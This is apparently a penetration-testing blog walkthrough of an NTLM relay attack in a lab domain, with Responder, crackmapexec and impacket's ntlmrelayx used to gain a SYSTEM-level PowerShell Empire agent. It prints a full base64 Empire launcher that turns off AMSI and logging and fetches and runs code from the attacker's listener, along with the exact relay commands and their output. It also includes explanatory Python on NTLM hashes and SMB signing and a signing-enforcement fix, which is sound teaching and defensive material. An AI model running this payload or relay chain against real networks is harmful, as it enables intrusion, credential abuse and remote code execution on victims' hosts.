Like most of my posts, I only scratch the surface and emulate a real attack. I don't go into depth, since there are plenty of other write-ups out there that do; instead, this is a step-by-step illustration of how the attack was conducted.
To get started, it is important to know the difference between some of the terms involved:
- NTLMv1/v2 is shorthand for Net-NTLMv1/v2; the two names refer to the same thing
- NTLM is different: it is the hash stored in the Security Account Manager (SAM) database and in the Domain Controller's NTDS.dit database
- You can perform Pass-The-Hash with NTLM hashes
- You cannot perform Pass-The-Hash with Net-NTLM hashes
- NTLM hashes can be obtained by dumping the SAM database or the NTDS.dit database, or with Mimikatz
- Net-NTLMv1/v2 (NTLMv1/v2) hashes are obtained with tools like Responder
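To make the distinction in the list above concrete, here is an added example (my own code, not from the original post or from any of the tools it uses). It computes an NTLM hash the way the SAM stores it (MD4 over the UTF-16LE password, with MD4 implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds), derives a Net-NTLMv2 response from that hash against a server challenge following MS-NLMP, and then plays the authenticating server that verifies the response. The user and domain names come from the post; the password, challenges, timestamp and target-info blob are constructed sample values. The point it shows is why the two are not interchangeable: whoever holds the NT hash can answer any fresh challenge (that is Pass-The-Hash), whereas a captured Net-NTLMv2 response only verifies against the one challenge it was computed for, so it is only useful while that exchange is in flight, which is exactly the window a relay works in.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is absent on many OpenSSL 3 builds."""
    def lrot(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: F(b, c, d) = (b & c) | (~b & d)
            a = lrot((a + ((b & c) | (~b & d)) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G(b, c, d) = majority, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = lrot((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H(b, c, d) = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = lrot((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The 'NTLM hash' stored in the SAM / NTDS.dit: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def av_pairs(pairs) -> bytes:
    """AV_PAIR list (target info) terminated by MsvAvEOL, as carried in the NTLMv2 blob."""
    body = b"".join(struct.pack("<HH", av_id, len(val)) + val for av_id, val in pairs)
    return body + struct.pack("<HH", 0, 0)


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure from MS-NLMP 3.3.2 that the client appends to its proof."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Net-NTLMv2 response: HMAC-MD5 keyed from the NT hash and bound to this server challenge."""
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    nt_proof = hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def verify_ntlmv2(nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """What the authenticating side does: recompute the proof from the stored NT hash and its own challenge."""
    nt_proof, blob = response[:16], response[16:]
    expected = ntlmv2_response(nt, user, domain, server_challenge, blob)[:16]
    return hmac.compare_digest(nt_proof, expected)


# Constructed sample values: the password, challenges and timestamp are made up for this example;
# the user and domain names are the ones that appear in the post.
USER, DOMAIN = "chuck", "GEODA-LAB"
SAMPLE_NT = nt_hash("password")
SAMPLE_BLOB = ntlmv2_blob(
    timestamp=131858000000000000,
    client_challenge=bytes.fromhex("a1b2c3d4e5f60718"),
    target_info=av_pairs([(0x0002, DOMAIN.encode("utf-16-le")),      # MsvAvNbDomainName
                          (0x0001, "LAB-DC01".encode("utf-16-le"))]),  # MsvAvNbComputerName
)


def demo() -> dict:
    challenge_first = bytes.fromhex("0123456789abcdef")  # challenge issued in the captured exchange
    challenge_later = bytes.fromhex("fedcba9876543210")  # challenge a target issues in a new session
    captured = ntlmv2_response(SAMPLE_NT, USER, DOMAIN, challenge_first, SAMPLE_BLOB)
    return {
        # Holding the NT hash itself, you can answer any new challenge: this is Pass-The-Hash.
        "nt_hash_answers_new_challenge": verify_ntlmv2(
            SAMPLE_NT, USER, DOMAIN, challenge_later,
            ntlmv2_response(SAMPLE_NT, USER, DOMAIN, challenge_later, SAMPLE_BLOB)),
        # A captured Net-NTLMv2 response only fits the challenge it was built for...
        "captured_fits_original_challenge": verify_ntlmv2(SAMPLE_NT, USER, DOMAIN, challenge_first, captured),
        # ...and is rejected against any other challenge, which is why it cannot be "passed" later.
        "captured_fits_new_challenge": verify_ntlmv2(SAMPLE_NT, USER, DOMAIN, challenge_later, captured),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The verifier function is the defender-side view: a domain member hands the challenge and response to the DC over NetLogon, and the DC recomputes the proof from the NT hash in NTDS.dit. That recomputation is bound to the server challenge, so nothing in this design stops a relay that forwards a target's own challenge to the victim in real time; only signing (covered at the end of the post) does.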
We first get Responder up and running, after turning off the SMB and HTTP servers in the responder.conf file so that ntlmrelayx can take over those ports:
We then need a list of targets to relay to. To find them, we use crackmapexec:
root@kali:/opt/Empire# crackmapexec smb 10.10.50.0/24
CME          10.10.50.106:445 LAB-WIN7-01     [*] Windows 7 Professional 7601 Service Pack 1 (name:LAB-WIN7-01) (domain:GEODA-LAB)
CME          10.10.50.103:445 LAB-WIN7-02     [*] Windows 7 Professional 7601 Service Pack 1 (name:LAB-WIN7-02) (domain:GEODA-LAB)
CME          10.10.50.250:445 LAB-DC01        [*] Windows 6.3 Build 9600 (name:LAB-DC01) (domain:GEODA-LAB)
[*] KTHXBYE!
As you can see, crackmapexec was able to find three hosts with SMB signing disabled: LAB-WIN7-01 (10.10.50.106), LAB-WIN7-02 (10.10.50.103) and LAB-DC01 (10.10.50.250). We add these to a target list file:
root@kali:~/LAB/NTLM-relay# echo "10.10.50.103" > targets.txt
root@kali:~/LAB/NTLM-relay# echo "10.10.50.106" >> targets.txt
root@kali:~/LAB/NTLM-relay# echo "10.10.50.250" >> targets.txt
We then create a listener in Empire so that, when we do catch credentials, ntlmrelayx relays them and runs a command that spawns an agent. Be sure to use a port other than 80, since that is the port ntlmrelayx will use for its HTTP server:
(Empire: listeners/http) > execute [*] Starting listener 'http' * Serving Flask app "http" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off [+] Listener successfully started! (Empire: listeners/http) > listeners [*] Active listeners: Name Module Host Delay/Jitter KillDate ---- ------ ---- ------------ -------- http http http://10.10.50.101:8888 5/0.0 (Empire: listeners) > launcher powershell http powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAEEAYgBMAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAcwBzAEUATQBiAGwAeQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAG8AbABsAGUAYwBUAEkATwBOAHMALgBHAEUATgBFAFIAaQBDAC4ARABJAGMAdABpAG8ATgBhAHIAeQBbAHMAdAByAEkAbgBHACwAUwB5AHMAVABlAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwAT
wBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAGUAewBbAFMAYwBSAGkAUABUAEIAbABPAGMAawBdAC4AIgBHAEUAVABGAGkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAEwAdQBlACgAJABuAHUAbABMACwAKABOAEUAdwAtAE8AYgBKAEUAQwB0ACAAQwBPAEwAbABFAGMAVABJAG8ATgBTAC4ARwBlAE4ARQByAGkAYwAuAEgAYQBzAGgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBFAEYAXQAuAEEAcwBTAEUATQBiAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATAB1AEUAKAAkAE4AVQBMAEwALAAkAFQAUgBVAGUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAEUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgBUAE0AQQBOAEEARwBFAFIAXQA6ADoARQB4AFAAZQBDAHQAMQAwADAAQwBPAG4AdABpAE4AdQBlAD0AMAA7ACQAVwBjAD0ATgBlAFcALQBPAEIASgBlAGMAVAAgAFMAeQBTAHQARQBNAC4ATgBFAFQALgBXAGUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAEQAZQBSAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBvAFgAeQA9AFsAUwBZAFMAdABFAG0ALgBOAGUAdAAuAFcARQBCAFIAZQBxAFUARQBzAHQAXQA6ADoARABFAGYAYQB1AGwAVABXAGUAYgBQAHIATwBYAFkAOwAkAHcAQwAuAFAAcgBPAFgAWQAuAEMAcgBlAGQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBlAFQALgBDAFIARQBkAEUATgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAGUAZgBhAHUATABUAE4ARQBUAHcATwByAGsAQwBSAEUAZABlAG4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAE0ALgBUAGUAeABUAC4ARQBOAGMATwBkAGkATgBnAF0AOgA6AEEAU
wBDAEkASQAuAEcAZQB0AEIAeQBUAEUAUwAoACcASgAlAFAASQBdACYATQA2AEsAVQApAE8AIwA/AFcANwB6AFsARABZAHIAZgBSAHYAPABfAGgAdQB3AHsALAAvACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4ANQAwAC4AMQAwADEAOgA4ADgAOAA4ACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAHcAQwAuAEgARQBBAEQAZQByAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHcASQBGAEIAcQA2AFEAawBLAHkAYgA1ADEAbABuAHMAbgBJAFAATABxAHUAbQBjADUAVwBnAD0AIgApADsAJABEAEEAVABBAD0AJABXAEMALgBEAG8AdwBOAEwATwBBAEQARABhAFQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQASQBWAD0AJABkAGEAdABBAFsAMAAuAC4AMwBdADsAJABEAGEAdABBAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAVABhAC4ATABlAG4ARwB0AEgAXQA7AC0ASgBPAGkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= (Empire: listeners) >
Now that we have everything we need, we fire up impacket's ntlmrelayx.py, pointing it at our targets file and using our PowerShell Empire launcher as the command to execute:
root@kali:/opt/impacket/examples# python ntlmrelayx.py -tf ~/LAB/NTLM-relay/targets.txt -c 'powershell -noP -sta -w 1 -enc <base64 launcher from above>'
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
In another window, we fire up Responder:
root@kali:~/LAB/NTLM-relay# python Responder/Responder.py -I eth0 -r -d -w
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

/!\ Warning: files/AccessDenied.html: file not found
/!\ Warning: files/BindShell.exe: file not found

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [OFF]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [OFF]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [10.10.50.101]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...
We then wait... and see that a shell has been spawned!
In our example we get a SYSTEM shell, since the account we caught with our attack was a Domain Admin:
(Empire: listeners) > agents

[*] Active agents:

  Name       Lang  Internal IP     Machine Name   Username            Process           Delay    Last Seen
  ---------  ----  -----------     ------------   ---------           -------           -----    --------------------
  EGRLSYH1   ps    10.10.50.103    LAB-WIN7-02    GEODA-LAB\chuck     powershell/1508   5/0.0    2018-11-02 09:14:40
  689TSVGA   ps    10.10.50.103    LAB-WIN7-02    *GEODA-LAB\SYSTEM   powershell/1464   5/0.0    2018-11-02 13:17:48

(Empire: agents) > interact 689TSVGA
(Empire: 689TSVGA) > shell
(Empire: 689TSVGA) > shell whoami
[*] Tasked 689TSVGA to run TASK_SHELL
[*] Agent 689TSVGA tasked with task ID 1
(Empire: 689TSVGA) >
[*] Agent 689TSVGA returned results.
nt authority\system
..Command execution completed.
[*] Valid results returned by 10.10.50.103
This was a very basic example of using Responder to intercept authentication attempts (Net-NTLM hashes) and ntlmrelayx to relay them to the hosts in our target list. Wherever the relay succeeds, it executes our PowerShell Empire launcher and spawns an agent.
It is important to note that this only works against hosts with SMB signing disabled.
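What crackmapexec was checking in the scan earlier, and the reason behind the caveat just stated, is the SecurityMode field of the SMB2 NEGOTIATE response: a relayed authentication only gets a session when the target does not require signing, because the relay never learns the session key needed to sign. Here is an added Python example (my own, not part of this post, crackmapexec or impacket) that parses that field out of a raw NEGOTIATE response and reports a per-host assessment the way a defender auditing for relay exposure would want it. Since there is no network here, the packets are constructed inline from the MS-SMB2 struct layout, and the host names are made up. One caveat worth knowing: SMB2 servers always advertise SIGNING_ENABLED, so a check that keys on that bit finds nothing; only SIGNING_REQUIRED protects a host.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every response header
SIGNING_ENABLED = 0x0001                   # SMB2_NEGOTIATE_SIGNING_ENABLED (always set by SMB2 servers)
SIGNING_REQUIRED = 0x0002                  # SMB2_NEGOTIATE_SIGNING_REQUIRED (the bit that stops relay)
HEADER_FMT = "<4sHHIHHIIQIIQ16s"           # 64-byte synchronous SMB2 header
NEG_RESP_FMT = "<HHHH16sIIIIQQHHI"         # 64-byte fixed part of the NEGOTIATE response


def build_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Construct a minimal SMB2 NEGOTIATE response; sample data for the parser below, not captured traffic."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    # StructureSize=65, SecurityMode, Dialect, ContextCount, ServerGuid, Capabilities,
    # MaxTransact/Read/Write, SystemTime, ServerStartTime, SecBufOffset/Length, ContextOffset
    body = struct.pack(NEG_RESP_FMT, 65, security_mode, dialect, 0, b"\x11" * 16,
                       0x7, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body


def parse_negotiate_response(packet: bytes) -> dict:
    """Pull dialect and SecurityMode out of an SMB2 NEGOTIATE response; raises ValueError on anything else."""
    if len(packet) < 128:
        raise ValueError("packet too short for SMB2 header + NEGOTIATE response")
    magic, hdr_size, _, status, command, _, flags, *_rest = struct.unpack(HEADER_FMT, packet[:64])
    if magic != SMB2_MAGIC or hdr_size != 64:
        raise ValueError("not an SMB2 packet (SMB1 uses \\xffSMB)")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    if status != 0:
        raise ValueError(f"negotiate failed, NTSTATUS 0x{status:08x}")
    body_size, security_mode, dialect, *_ = struct.unpack(NEG_RESP_FMT, packet[64:128])
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": f"0x{dialect:04x}",
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def looks_like_smb2_negotiate_response(packet: bytes) -> bool:
    """Boolean wrapper for callers that just want to filter a packet stream."""
    try:
        parse_negotiate_response(packet)
        return True
    except ValueError:
        return False


def signing_assessment(host: str, packet: bytes) -> str:
    """One line per host; the relay-relevant fact is SIGNING_REQUIRED, not SIGNING_ENABLED."""
    info = parse_negotiate_response(packet)
    if info["signing_required"]:
        return f"{host}: signing REQUIRED (dialect {info['dialect']}) - relayed NTLM sessions are rejected"
    return f"{host}: signing NOT required (dialect {info['dialect']}) - exposed to NTLM relay, enforce signing"


# Constructed samples: a workstation at default settings (enabled, not required) and a host that enforces it.
SAMPLES = {
    "lab-workstation": build_negotiate_response(SIGNING_ENABLED),
    "hardened-server": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED, dialect=0x0311),
}


def assess_all(samples=None) -> list:
    return [signing_assessment(host, pkt) for host, pkt in (samples or SAMPLES).items()]


if __name__ == "__main__":
    for line in assess_all():
        print(line)
```

On the Windows side, the fix for every host this reports as exposed is to require signing on the server side (`Set-SmbServerConfiguration -RequireSecuritySignature $true -Force`, or the "Microsoft network server: Digitally sign communications (always)" policy), which is on by default only on domain controllers.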
Hope this helps!
geoda